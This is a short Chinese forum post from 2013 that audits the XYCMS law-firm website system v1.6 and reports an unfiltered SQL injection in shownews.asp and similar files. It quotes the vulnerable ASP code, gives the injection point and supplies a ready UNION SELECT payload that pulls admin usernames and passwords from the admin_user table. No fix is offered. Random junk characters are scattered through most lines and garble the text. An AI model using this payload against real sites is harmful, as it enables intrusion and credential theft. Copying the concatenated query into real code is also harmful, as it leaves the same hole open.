前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
. P% \2 C5 D k p. q7 h ' b7 _$ o# Q/ s8 A
淫荡分割线
- d+ ^" F+ z; |--------------------------------------------------------$ m4 ?; P7 t& e* e g( v
! K5 W! h& o1 t; S, ~! M
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测); b R9 ]. H/ N8 B. r
源码地址:http://down.chinaz.com/soft/29233.htm
8 M$ P8 N, ?7 M) Y2 w+ i 9 e! X0 D0 g, R
漏洞文件:shownews.asp8 m- g+ i5 ]2 I6 t
漏洞代码:7-13行# C5 f* A: u5 O0 a2 s2 X6 Q3 M! r( b0 X7 A
. H9 m" V; ~1 D- P/ U) w, f
* F2 }; Y8 ?! s<%
) }/ x8 X& G/ k& i kid=request.QueryString("id")
; u ?/ o. i! c5 X3 R 2 d/ G; V7 A% t0 z
set snews=server.createobject("adodb.recordset")
4 r1 o( B2 i8 xexec="select * from [news] where id="&id
# H% h& C& w6 @% ^% [9 w1 _# Nsnews.open exec,conn,1,1
' m: U, y6 X( ^* i3 Z- q' g! X2 t$ Y%> j# T& N u+ l
1 {7 F& T) m. ]
" _/ d4 c9 e$ ~4 ?8 k# V. }5 X什么过滤都没有 直造成注入
+ z, P' x8 |8 Q
1 @6 H, ?: d3 c# ^) s \注入点:http://127.0.0.1:99/shownews.asp?id=xx
! e* a* O) O6 u) c" q& U; ^ 6 B" V- ~, N8 Z8 P
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
- d0 ]7 V- S5 ^1 }! m% x3 G, O% k% s
: v6 h; ~- C4 H1 I) ^: g% ? / j# K) z, H2 U
exp: union select 1,admin,password,4,5,7 from admin_user
4 M J& P2 w2 Y; U$ u3 p7 z! r- j( a3 |& k6 D1 H: x L
|
发表于 2013-4-4 17:28:12
收藏
支持
反对